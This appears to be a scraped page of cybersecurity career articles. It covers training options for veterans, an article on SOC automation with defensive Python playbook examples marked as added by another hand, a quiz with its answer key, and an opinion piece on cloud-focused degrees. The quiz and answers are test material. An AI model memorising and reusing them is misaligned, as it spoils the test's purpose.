Veterans can access complimentary cybersecurity training and scholarships, enabling them to acquire the knowledge, skills, and abilities (KSAs) needed for entry into the cybersecurity sector. The CyberCorps®: Scholarship for Service (SFS) initiative, a collaboration between the Department of Homeland Security (DHS) and the National Science Foundation (NSF), extends cybersecurity scholarships to exceptional undergraduate, graduate, and doctoral students. Eligible individuals can receive financial support ranging from $27,000 to $37,000 for their studies at participating institutions. SFS scholarships cover the typical expenses of full-time students at participating institutions, encompassing tuition and related fees, for a maximum of two years. When combined with the Post-9/11 GI Bill, which provides up to 36 months of financial assistance for education and training in various fields, including cybersecurity, veterans may have the opportunity to earn a cybersecurity degree without incurring costs. DHS facilitates training through the Federal Virtual Training Environment (FedVTE) platform, an online, on-demand training resource accessible to government employees and veterans. FedVTE offers over 800 hours of free training on cybersecurity and IT topics, ranging from beginner to advanced levels. The courses cover diverse areas such as ethical hacking, risk management, surveillance, and malware analysis. Additionally, they align with certifications like Network+, Security+, and Certified Information Systems Security Professional (CISSP). The SANS Institute's VetSuccess Academy is tailored to support veterans in their cybersecurity endeavors; however, it has been mentioned that this SANS program should be viewed as more of a lottery ticket, because people rarely see anyone get picked for any particular cohort.
However, people have had success getting the GI Bill to pay for a SANS degree, which bundles individual certifications into a degree program. The certifications themselves are highly regarded in cybersecurity and very expensive. That said, I have recently heard that the GI Bill may no longer pay for SANS courses. One problem that is common with military folks is that they focus heavily on certifications but don't get the hands-on experience and deep theory they need for entry-level technical positions. To make matters worse, the people I've talked with don't feel that cybersecurity degree programs prepare the transitioning military well, as they focus on high-level policy. The military trains you to look for qualifications and to meet the requirements for service ribbons and medals. And since certifications don't matter as much as practical hands-on project work, veterans fall prey to predatory bootcamps at an above-average rate, leaving them still unqualified to do the work or pass the interview. Note: the veterans I've talked with recommend a general computer science degree program at a brick-and-mortar college if you choose to go the degree route. Before you transition, be aware of SkillBridge. Essentially, it allows military members on active duty to spend the last 180 days of their time on active duty working (for free to the business) for a company as an intern. They maintain their military pay and benefits. The company gets a free intern. This can often pivot into a full-time offer upon separation from the service, but if not, it will give you a little experience and someone to vouch for you. Furthermore, VeteranSec serves as an online community for military veterans engaged in or interested in information technology and cybersecurity. The platform provides a private networking channel of over 7,000 veterans, free training videos, partnerships with companies to take advantage of, and an informative cybersecurity blog with tutorials to aid veterans in their professional development.
Summary

I hope this article has provided a few additional helpful strategies for your road to success. Each of these backgrounds presents an opportunity for us to provide insights into the challenges, even reputations, that you are fighting against and need to be aware of as you trudge the road ahead. Use the tools given to you in this book, with the additional insight from this article, to form a plan of attack for your job search and, if you're lucky, interviews. Not everyone will have the same experience on their journey to success. Some will have it more difficult than others. We're not all on the same playing field. I know that may not be what you want to hear, but corporate America, and capitalism in general, is a game. Once you learn the rules and what moves you forward, you can strategize what makes you desirable to employers. You build a brand for yourself. For me, it was certifications and education to start with, but after some years, I rarely even mention them during interviews, and I'm never asked about them because we're too busy talking about experience. If you have experience, it trumps everything. If you don't yet, you need a formal school, the community, your friends, any internships, former employers, and even yourself to vouch for you and provide examples to show your potential value. And for the lone hackers, the autodidacts, the self-taught, let's all remember that, whatever the case may be, they are the underdogs, but they are the few and the proud. Be nice to them and make friends; you'll thank me later.
- Starting SOC Automation
This article discusses the maturity models of Security Operations Centers, how to know where your SOC is at, and how to embrace SOC automation and stay ahead of the curve. Automation within the Security Operations Center (SOC) is generally referred to as Security Automation and Orchestration (SAO) or Security Orchestration, Automation, and Response (SOAR). As an analyst, it has become increasingly common to encounter some type of security automation within organizations. To what extent depends on the maturity of your organization and its SOC. We will dive into maturity models and how they relate to automation a bit later in this article. First, what is security automation?

What Is SOC Automation?

No, SOC automation does not refer to robots becoming self-aware. Threat intelligence feeds do not suggest that "judgment day" is close on the horizon. Simply stated, automation is the machine implementation of low-level security-related actions. These actions are small pieces of a larger task. Generally, a task is made up of a number of actions, and a process encompasses a number of tasks. Tasks can be partially or fully automated with the goal of reducing human intervention in security operations. Orchestration, while very closely tied to automation, takes advantage of multiple automation tasks across multiple systems or platforms. Orchestration is used to automate or semi-automate more complex workflows and processes. We have heard criticism from SOC analysts and others in the security community regarding automation. The overwhelming theme seems to be that analysts are worried that automation will take their job. At first glance I can see where they are coming from. If a machine can do it faster and more efficiently, then what is the analyst to do? Believe me, I get it! As a SOC lead, I want to challenge my analysts to do a detailed analysis of events.
That takes a good amount of time and is not possible with the volume of events seen on a daily basis. I want them to look for trends, examine data over a longer period of time, and then find the reason these events are taking place. To ask themselves questions like: "Am I responding to 50 events per day on this IPS signature because the web server is actually vulnerable?" Present that data back to your SOC leadership, and take the initiative to get the business to patch the vulnerability. What we are attempting to convey is that SOC automation should not be seen as a limitation on your career, but rather a springboard that can help you become a better analyst. We will go over a number of reasons for automation in the next section that should paint a clearer picture of the benefit of automation, not only to the SOC but to the individual analysts as well. Let's dig into why automation is a positive addition to any SOC.

Why Automate?

There are a number of reasons for a SOC to automate, but be assured that replacing analysts is generally not the goal. The SOC analyst is a valuable resource who will always be needed to perform where machines cannot. Whether as part of a maturity initiative or because of new business requirements, leadership is often left taking on additional services with the same or fewer resources. Taking into account that SOC leadership is being pressured to deliver more, combined with the shortage of skilled cybersecurity professionals, it is easy to see why automation is a no-brainer. I have spent time in the trenches working through an endless queue of events. When I was a junior analyst, there were days when I would have a number of events generated for antivirus detections where the files had been quarantined. Over half of the events that day were "potentially unwanted applications" (PUA), adware/toolbar related. The tool did its job and the files were quarantined, yet I still had a number of events that needed to be addressed.
I had to manually add the appropriate notes and close each ticket. If I had had automation in place, it would have made my life a lot easier. I would have been able to focus on more in-depth analysis and look for a common source of the adware, but due to the sheer volume of events, that was not an option at the time. For me, automation is a force multiplier when it comes to helping analysts with the flood of events they handle on a daily basis. By eliminating the need for analysts to do monotonous tasks, they are free to spend more time performing higher-level analysis of events. Senior analysts will have more time to dedicate to training junior analysts, and more time can be spent on developing documentation. With the ever-changing pace of a SOC, we all know this is always needed. One of the first reasons a SOC may choose to automate is to streamline existing processes. Many SOAR platforms have C-level dashboards designed to show the amount of time and money saved by automating actions. While I do agree to an extent that this can be important, focusing on this alone may not be the best fit for all organizations. There are a number of other reasons that I believe are equally important to the operation of a healthy SOC. One of my favorite reasons for automating is to reduce analyst fatigue. I cannot be the only analyst who has spent what seems like hours a day pressing "Ctrl+C" and "Ctrl+V." I have gone home at the end of the day brain-fried, wondering if a monkey could do the job just as well. As I mentioned earlier, security analysts are the most important resource a SOC has. These analysts are inundated day in and day out with an abundance of information that needs to be collected, categorized, classified, analyzed, and interpreted. Reducing the volume of events that need to be analyzed by hand is one way to relieve this. Reducing analyst fatigue benefits the SOC by reducing overall stress and making it a fun and challenging place to work.
Isn’t the saying: “Happy SOC, Happy Life”? Good leadership should strive to do all that they can to promote morale and a healthy workplace environment. Doing the same repetitive actions day-in and day-out will desensitize you and cause you to skip steps or cut corners. This fatigue increases the possibility for mistakes to be made. Reducing mistakes leads me to another popular reason for automating, which is standardizing processes. Analysts can get trapped in an endless screen-switching cycle during an investigation by checking documentation, following defined steps, and moving between multiple consoles. When automating security-related tasks, we drive consistency and reduce the likelihood for errors. Consistency is key in security operations. During incident response when we implement automation, we can ensure that processes are consistently followed. As a SOC analyst, it is very easy to cast wide nets in order to collect as much information as possible. Sometimes the rules we write just need to be broad. The events generated by a rule may only be an indicator when correlated to another event or other condition. Sure, you could write a correlation rule, but maybe you are in the infancy of tuning a rule, and thus analysts receive a large number of false-positive detections. What if we could use automation to tune out these false positives? Reducing the overall volume of false positives is one such use case that I have spent a good amount of time automating. I will give an example of this later in the article. Each analyst has their own preference for sources of information, and this can sometimes create false positives or lead an analyst down the wrong rabbit hole. As mentioned previously, consistency is important for a number of reasons, but in addition to those already mentioned, another reason to automate is for the reduction of information bias. There are some reputation and intelligence data sharing services that are higher fidelity than others. 
Open source feeds can be a double-edged sword. On one side they may have larger reference sets and be of good quality, but on the other side, I have found that it is easier for one wrong attribution to skew a whole dataset. When the sources from which data is ingested and consumed are defined by the team, reputation checking and intelligence enrichment can be easily automated within your playbooks. Every few months, it seems, there is a new attack pattern, and threats are becoming more complex every day. Organizations need to be prepared for this evolution of complex threats. Adversaries today are utilizing automation to conduct attacks against your organization. Security operations need to keep up with the speed at which attackers are evolving, and the only way to do this is through automation and orchestration. As you implement new automation playbooks, the end goal should be to reduce the mean time to detection (MTTD) and mean time to response (MTTR). Each step that is automated shaves time from these SOC metrics. While at first glance it may not seem that a machine could save much time per single action, the accumulation of all of these small savings over time adds up to significant time saved. The decrease in these metrics will satisfy senior management while also providing the numerous benefits mentioned previously.

SOC Maturity

I would like to preface this section by stating that I do not think many organizations would expect to fully automate every process from beginning to end. I believe there are just so many situations that require an analyst to make a decision a machine cannot. There have been many horror stories of automation putting blocks in place based upon the wrong classification of the data. These instances have had catastrophic effects on businesses and their reputations.
Until an organization has a high confidence level in the data being provided, I would personally suggest adding some checks and balances into automation processes. These checks and balances should require human interaction and approval before blocking controls are put in place. All of these steps can be built into your playbooks to ensure that you not only take advantage of automation to the fullest extent possible but also keep automation from taking an incorrect action. The goal of this article is not to go into a deep dive on the topic of maturity models. There are a few different ways to go about measuring the maturity of your SOC. You can write your own framework or use an industry standard framework to accomplish the same goal. The benefit of using a standardized framework is that it is recognized and probably being used by other organizations within your industry. Both approaches are designed to provide a situational summary of where the SOC is in its maturity, taking into account all of its processes.

Figure 1–1 Sample Maturity Phases

When assessing the maturity of the SOC and its automation, it's easy enough to start with a staged approach similar to the one shown in Figure 1–1. I put this graphic together to illustrate that once you have completed an inventory of the processes and actions your SOC performs today, you can map your current state and measure your progress toward your goals. Set small goals to get you to the next phase. If you have not begun your automation journey, don't be afraid of starting now. Each action you automate will get you closer to your goals. As a junior analyst, you will begin to see areas for improvement in the processes that you and your team use every day. Document any process gaps and look for actions that can be automated. Take time to gather all of the appropriate data, and do the analysis. Can any of these actions be automated? What benefit do you see it providing the team?
Be able to articulate how you believe automating an action will improve the function. By presenting a process improvement or a resolution to a problem, and not just the gap, you will set yourself up as a leader among your peers, and SOC leadership will see you as a true problem solver.

How to Start Automating

There is no one-size-fits-all solution for every organization. In my experience, it has been most beneficial for analysts within the SOC who are intimately familiar with their processes and procedures to spend a little time analyzing the work they perform each day. Categorize your tasks by the time required to complete them, and then by the complexity of the task. Start with the tasks that are simple and do not take a lot of time to complete, and leave the complex tasks for after you are comfortable with the process flow. Chances are that there are a number of these simple tasks, and by automating them you will make a good amount of progress. Figure 1–2 may help you categorize your tasks and focus on the automation tasks that will provide the most value up front.

Figure 1–2 Security Task Categorization

When starting with a simple task that takes a short time to complete, look for repetitive actions without complex conditions. If you take different actions based upon the output of an earlier action, it adds complexity to the playbook. I have found that it is very easy to start working through a use case, only to find out halfway through that one small attribute changes the whole thing. Spend time dissecting the actions and whiteboard the process flow. Make every effort to break it down to the smallest steps that you can. A very simple example of automating a task like this is getting the reputation of a file. It should make it a bit easier to envision the steps taken.
Figure 1–3 Simple use case of getting a file reputation

In this simple example, I have broken the task down into four small actions that an analyst would need to take:
1. Gather the file hash.
2. Open a web browser.
3. Paste the hash into the browser and submit it.
4. Make a decision based upon the file reputation.
The decision made upon the file reputation may then feed another action or a process flow further downstream. A playbook can be this small. Keep in mind that it is possible to have a playbook that calls other playbooks synchronously, waiting for the first one to complete before calling another. At first glance, it may not look like automating this task would save much time. What if the hash was a false-positive detection? What if we could automatically close the event based on the file reputation? What if we could collect the false-positive file and submit it back to the vendor to be reevaluated? Not only would automation help by eliminating the noise of false-positive detections, it would also reduce the number of tickets you need to respond to. Now this short, simple action has saved a significant amount of time when scaled to the number of events that need to be investigated in a day.

Sample Use Cases

I have come across a number of use cases discussed in different articles around the Web. Maybe some of them will work for you, or maybe they will just spark some ideas on what can be done. As I mentioned earlier in this article, there is no one size fits all. Vendors supply sample playbooks that are generally meant as teaching points for what their product can do. Unfortunately, not every solution will be able to be integrated with your automation platform. You will encounter situations that may not work in your environment, just as you will also encounter situations the vendor has not specifically encountered before. This is to be expected and is all part of the journey of SOC automation.
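The four file-reputation actions above, written out as a small playbook. This is an added example, not code from the article or from any SOAR product: REPUTATION_DB is a constructed dictionary standing in for a vendor reputation API, the Ticket shape, status names and score thresholds are assumptions about your ticketing platform, and the approvals set stands in for whatever approval step your SOAR or chat tooling provides. It also wires in the check-and-balance the SOC Maturity section asks for: a known-good hash is closed as a false positive, a known-bad hash produces a proposed block that is never executed until a human has approved it, and anything in between lands in the analyst queue.

```python
"""File-reputation playbook: the four analyst actions above, automated.

Added example, not the article's or any vendor's code. REPUTATION_DB is a
constructed stand-in for a vendor reputation API; Ticket, the thresholds and
the approvals set are assumptions about your ticketing and SOAR platform.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from enum import Enum

SHA256_RE = re.compile(r"[0-9a-f]{64}")


class Verdict(Enum):
    CLEAN = "clean"
    MALICIOUS = "malicious"
    UNKNOWN = "unknown"


# Constructed reputation data: hash -> "confidence malicious" score, 0-100.
# Hashes absent from the source are unknown, which is the common case.
REPUTATION_DB = {
    "a" * 64: 0,    # known-good, e.g. a signed vendor binary
    "b" * 64: 98,   # known-bad
    "c" * 64: 55,   # engines disagree; low confidence either way
}

# Playbook settings (assumed). Tune them to the fidelity of your real source.
MALICIOUS_THRESHOLD = 90
CLEAN_THRESHOLD = 5


@dataclass
class Ticket:
    ticket_id: str
    file_hash: str
    status: str = "open"
    notes: list[str] = field(default_factory=list)
    pending_actions: list[str] = field(default_factory=list)


def lookup_reputation(file_hash: str) -> tuple[Verdict, int | None]:
    """Action 3: submit the hash and classify the returned score."""
    score = REPUTATION_DB.get(file_hash)
    if score is None:
        return Verdict.UNKNOWN, None
    if score >= MALICIOUS_THRESHOLD:
        return Verdict.MALICIOUS, score
    if score <= CLEAN_THRESHOLD:
        return Verdict.CLEAN, score
    return Verdict.UNKNOWN, score


def run_playbook(ticket: Ticket, approvals: set[str] | None = None) -> Ticket:
    """Actions 1-4. `approvals` holds block actions a human has signed off on."""
    approvals = approvals or set()

    # Action 1: gather the hash from the ticket and normalise it before lookup.
    file_hash = ticket.file_hash.strip().lower()
    if not SHA256_RE.fullmatch(file_hash):
        ticket.notes.append("hash failed validation; left for analyst review")
        ticket.status = "analyst_queue"
        return ticket

    # Actions 2-3: the browser steps collapse into one API call.
    verdict, score = lookup_reputation(file_hash)
    ticket.notes.append(f"reputation={verdict.value} score={score}")

    # Action 4: decide, with a human gate in front of any blocking control.
    if verdict is Verdict.CLEAN:
        ticket.status = "closed_false_positive"
    elif verdict is Verdict.MALICIOUS:
        action = f"block_hash:{file_hash}"
        if action in approvals:
            ticket.notes.append("block executed after analyst approval")
            ticket.status = "closed_contained"
        else:
            # Propose the block; never execute it without approval.
            ticket.pending_actions.append(action)
            ticket.status = "awaiting_approval"
    else:
        ticket.status = "analyst_queue"
    return ticket


if __name__ == "__main__":
    for h in ("A" * 64, "b" * 64, "c" * 64, "d" * 64, "not-a-hash"):
        t = run_playbook(Ticket(ticket_id=f"T-{h[:4]}", file_hash=h))
        print(t.ticket_id, t.status, t.pending_actions)
```

The thresholds are deliberately asymmetric. Auto-closing a ticket on a score of 0 is cheap to undo, while a block that fires on a bad attribution is exactly the horror story described above, so the block only ever lands in pending_actions and a second call with the approval set executes it; a parent playbook that calls this one synchronously can re-run it once the approval arrives.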
I wanted to highlight a couple of use cases that I have personally encountered and had good success with. They do not cover every use case or reason that a SOC may choose to automate; however, they may act as a starting point or inspiration for your automation endeavors. One use case I encountered was reducing the number of false-positive detections from an email hygiene provider. The team utilized a service that sends alerts for a malicious email that was delivered. There were times when, after the alert was sent, the email was reclassified as clean. I wrote an automation playbook that would call the email hygiene provider's API to check for the "false-positive" flag. If the alert was a false positive, an analyst ticket would not be created. Another use case, which was a bit more advanced, was paging on-call analysts when critical events came in. We started by defining the types of events that would cause an analyst to be paged out. Once that was complete, we began to figure out how to determine who was on call and their page address. This took a bit of custom Python code using the Beautiful Soup library. The playbook would scrape an intranet page, parse out the email address to page, and send an alert to that analyst with the context of the critical event. Once that step was complete, the playbook would monitor a mailbox for a read receipt for the page. If the page was not acknowledged within an hour, the playbook would send the same page to the on-call escalation point. The most common automation use case that I have helped put in place is the enrichment of events with threat intelligence. In this environment, events are sent from the SIEM to the automation platform for processing, and a ticket is created in a temporary ticket queue. The playbook extracts indicators such as file hash, file path, source and destination IP addresses, etc.
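The enrichment use case just introduced, carried through end to end as an added example (not the article's or any vendor's code): indicators are pulled out of a constructed SIEM event, enriched only from sources the SOC has defined, and the ticket is moved from the temporary queue to the analyst queue only once every enrichment has completed without error, which is the hand-off the description below goes on to explain. The event text, the intel tables, the internal address ranges, the queue names and the per-event-type enrichment plan are all assumptions.

```python
"""Threat-intel enrichment playbook: extract indicators, enrich them from the
sources the SOC has chosen, and hand the ticket to the analyst queue only when
every enrichment has completed.

Added example, not the article's or any vendor's code. SAMPLE_EVENT, the intel
tables and INTERNAL_NETS are constructed; queue names and ENRICHMENT_PLAN are
assumptions about your SIEM and ticketing setup.
"""
from __future__ import annotations

import ipaddress
import re
from typing import Callable

# Wide-net patterns; the IP one is loose on purpose and validated afterwards.
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^\\\s]+\\)*[^\\\s]+")

# The SOC defines its own internal address space (constructed here). Note that
# ipaddress.is_private would also flag documentation ranges like 203.0.113.0/24.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

SAMPLE_HASH = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"

# Constructed SIEM event, as the automation platform might receive it.
SAMPLE_EVENT = {
    "id": "EVT-1001",
    "type": "edr_detection",
    "message": (
        "Process C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe "
        f"(sha256 {SAMPLE_HASH}) connected from 10.20.30.40 to 203.0.113.7:443"
    ),
}

# Constructed intel tables standing in for the team-approved reputation sources.
HASH_INTEL = {SAMPLE_HASH: {"verdict": "malicious", "family": "constructed-sample"}}
IP_INTEL = {"203.0.113.7": {"verdict": "suspicious", "tags": ["scanner"]}}


class EnrichmentError(Exception):
    """Raised by a source on timeout, auth failure or malformed response."""


def lookup_hash(file_hash: str) -> dict:
    return HASH_INTEL.get(file_hash, {"verdict": "unknown"})


def lookup_ip(ip: str) -> dict:
    return IP_INTEL.get(ip, {"verdict": "unknown"})


DEFAULT_SOURCES: dict[str, Callable[[str], dict]] = {
    "hash": lookup_hash,
    "external_ip": lookup_ip,
}

# Which indicator kinds to enrich for which event type (assumed mapping).
ENRICHMENT_PLAN = {
    "edr_detection": ("hash", "external_ip"),
    "ids_alert": ("external_ip",),
}


def extract_indicators(message: str) -> dict[str, list[str]]:
    """Pull hashes, paths and IPs out of free text; split IPs by address space."""
    hashes = sorted({h.lower() for h in SHA256_RE.findall(message)})
    paths = sorted(set(WIN_PATH_RE.findall(message)))
    internal, external = set(), set()
    for raw in IPV4_RE.findall(message):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            continue  # the loose regex also matches things like 999.1.1.1
        (internal if any(ip in n for n in INTERNAL_NETS) else external).add(str(ip))
    return {"hash": hashes, "path": paths,
            "internal_ip": sorted(internal), "external_ip": sorted(external)}


def enrich_event(event: dict,
                 sources: dict[str, Callable[[str], dict]] = DEFAULT_SOURCES) -> dict:
    """Create the ticket in the temp queue, enrich, then hand off or hold."""
    ticket = {"id": event["id"], "queue": "temp", "notes": [], "errors": []}
    indicators = extract_indicators(event["message"])
    ticket["indicators"] = indicators
    for kind in ENRICHMENT_PLAN.get(event["type"], ()):
        for value in indicators.get(kind, []):
            try:
                result = sources[kind](value)
            except (EnrichmentError, OSError) as exc:
                ticket["errors"].append(f"{kind} {value}: {exc}")  # keep going
                continue
            ticket["notes"].append(f"{kind} {value} -> {result}")
    # One state change, at the end, and only if nothing failed: a partially
    # enriched ticket stays in temp so it can be retried rather than handed to
    # an analyst with half the context missing.
    if not ticket["errors"]:
        ticket["queue"] = "soc_analyst"
    return ticket


if __name__ == "__main__":
    print(enrich_event(SAMPLE_EVENT))
```

Internal addresses are extracted but deliberately not sent to an external reputation source, and the per-event-type plan is what keeps two analysts from enriching the same alert from different feeds. Running enrich_event with a source that raises leaves the ticket in the temp queue with the failure recorded, which is the error-checking-before-hand-off behaviour the use case describes.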
Depending on the event type, these indicators are enriched from various sources predefined by the SOC. The data is used to populate notes in the event and add context for the analyst who works it. Once all of this enrichment is complete, the playbook moves the ticket from the temporary queue to the SOC analyst queue. The reasons for moving it to the analyst queue only after all the enrichment is done are to avoid a ticket state change once it is already in the analyst queue and to ensure that any error checking added to the playbook has completed first. I want the analyst to have all the data they need to make a decision on the event, instead of only partially complete data.

Summary

Security automation is a tool that assists your SOC analysts and allows them to be more effective in their work. In my opinion, it is not designed to be a replacement for an analyst. We invest in automation technology to make us more efficient at our jobs, and we are still going to be required to make decisions where a machine cannot. I don't want to focus directly on best practices for writing automation playbooks, but more on the overall process and how it relates to the SOC. With that in mind, I want to leave you with a few tips for success. If you have not already begun your automation journey, talk with your team about the benefits of security automation. Get everyone on board with the idea and comfortable with how you envision the playbooks working for the team:
- Do a full inventory of the tasks your SOC performs. Break them down by the time required and the complexity to complete them.
- Define your use cases before automating any actions.
- Focus initially on tasks that are simple and can be completed quickly. This will provide you with some quick wins.
- Don't write long, complicated playbooks. Break them down into specific tasks as much as possible. You can use a parent playbook to call multiple child playbooks.
- Don't be afraid to challenge the status quo.
When you start automating processes, you may discover a new and better way to do something. Embrace these efficiencies, and automation will show its value to your organization.

While security automation may be in its infancy, there is much that can be done to improve the operations within your SOC. I hope I was able to provide some insight into why you need to begin automating sooner rather than later. I have highlighted a number of reasons for automating and provided some possible use cases for quick wins. Take the lead, and show the rest of your team that automation is not a limitation but a force multiplier that will help you all become better analysts.

ARTICLE QUIZ (ANSWERS FOLLOW)

_______ is the machine implementation of low-level security-related actions which are smaller pieces of a larger task. Ⓐ SOC Automation Ⓑ Process Ⓒ Orchestration Ⓓ Inventory

_______ takes advantage of multiple automation tasks across multiple systems or platforms. Ⓐ Automation Ⓑ Process Ⓒ Orchestration Ⓓ Inventory

A _______ is made up of a number of actions that are fully or partially automated while a _______ encompasses a number of the former. Ⓐ process, task Ⓑ task, process Ⓒ process, response Ⓓ response, task

All the following are true regarding automation except: Ⓐ It will replace analysts in the next five years. Ⓑ It streamlines existing processes. Ⓒ It frees up analysts from monotonous tasks. Ⓓ It manages the flood of events coming in daily.

All the following are reasons to implement SOC automation except: Ⓐ Reduce analyst fatigue Ⓑ Reduce mistakes Ⓒ Reduce productivity Ⓓ Reduce labor hours to increase skilled training

Which of the following is true regarding how to start automating the Security Operations Center (SOC)? Ⓐ Start with complex changes Ⓑ Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks. Ⓒ Figure out who to fire first.
Ⓓ Make tasks more complicated than they should be.

All of the following are true about playbooks except: Ⓐ They can be small. Ⓑ They can call other playbooks synchronously. Ⓒ They’re only used in fantasy football. Ⓓ They should not cause incorrect or damaging actions.

ARTICLE QUIZ SOLUTIONS

_______ is the machine implementation of low-level security-related actions which are smaller pieces of a larger task.
Ⓐ SOC Automation. SOC Automation is the machine implementation of low-level security-related actions which are smaller pieces of a larger task.

_______ takes advantage of multiple automation tasks across multiple systems or platforms.
Ⓒ Orchestration. Orchestration takes advantage of multiple automation tasks across multiple systems or platforms.

A _______ is made up of a number of actions that are fully or partially automated while a _______ encompasses a number of the former.
Ⓑ task, process. A task is made up of a number of actions that are fully or partially automated, and a process encompasses a number of tasks.

All the following are true regarding automation except:
Ⓐ It will replace analysts in the next five years. Replacing analysts in the next five years is not entirely true. While SOC automation aims to reduce the amount of manual labor, SOC automation should be a springboard that frees up an analyst to work on more challenging tasks, preparing them to move out of the SOC into more advanced roles or to become a SOC Automation Engineer responsible for automating SOC Analyst tasks. A smaller number of SOC analysts will always be needed to review the SOC automation’s work, assist in the SOC automation efforts, and handle exceptions.

All the following are reasons to implement SOC automation except:
Ⓒ Reduce productivity. Reducing productivity is not a reason to implement SOC automation.

Which of the following is true regarding how to start automating the Security Operations Center (SOC)?
Ⓑ Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks. Someone who is intimately familiar with the Security Operations Center (SOC) processes and procedures should start by taking an inventory of the SOC tasks.

All of the following are true about playbooks except:
Ⓒ They’re only used in fantasy football. There are many constructive uses for playbooks other than in fantasy football, including in SOC Automation.

Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn.

You can sign up for a Lifetime Membership of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the Forums, the Knowledge Base, our True Entry Level SOC Analyst Jobs, Job Hunting Application Tracker, Resume Template, and Weekly Networking Checklist. Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer.
Check out my latest book, Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success, 2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, Kindle, or PDF versions. The downloadable PDF version can be grabbed here.
- Should Cybersecurity Degree Programs Have a Cloud Focus
If I was just graduating high school or deciding how to get started in cybersecurity, knowing what I know now, I wouldn’t ever consider a program that didn’t teach cloud skills (few of them do). By the time I would graduate, everything I learned would be obsolete. Within the next five years, most companies will have finished their migration to the cloud, or at least be close to it, or even just be beginning it; it’s the focus. This is Should Cybersecurity Degree Programs Have a Cloud Focus?

Cloud skills are so difficult to teach because they change rapidly. Institutions have no way to keep their curriculum up to date. I have a cloud course and I’ve already had to go through and keep it updated. It changes so much that I put the year it was last updated in the title, just so that everyone knows it’s still relevant. It’s super easy to update a course on a website or Udemy. Record a module and bam, upload it. But updating a college course or program with students enrolled in it, which has all these accreditation requirements, has to be carefully planned and executed, and by the time it all happens it needs to be updated again. If it doesn’t get easier to train for cloud skills, it’s perhaps the end of degree requirements for IT altogether.

Microsoft and AWS have the same problem. They need people trained on their platforms too, and they know how difficult it is to do, so they’re doing it themselves. I’ve taken some of the Microsoft Azure training and I liked it. It all works! That’s so hard to do. They keep it updated but the content is limited. It’s not comprehensive by a long stretch. There are so many cloud fundamentals to learn that aren’t vendor specific that universities aren’t teaching. They could cover cloud fundamentals in one semester but they don’t.

If you’re just starting out, I wouldn’t consider any program that didn’t teach you the cloud. And I mean it. Don’t do it. You’re probably going to get your degree and you’re not going to be able to find a job.
Any program that’s teaching you infrastructure or perimeter defense is obsolete by the time you graduate. It was a waste of your time and money (and you have to pay that back!).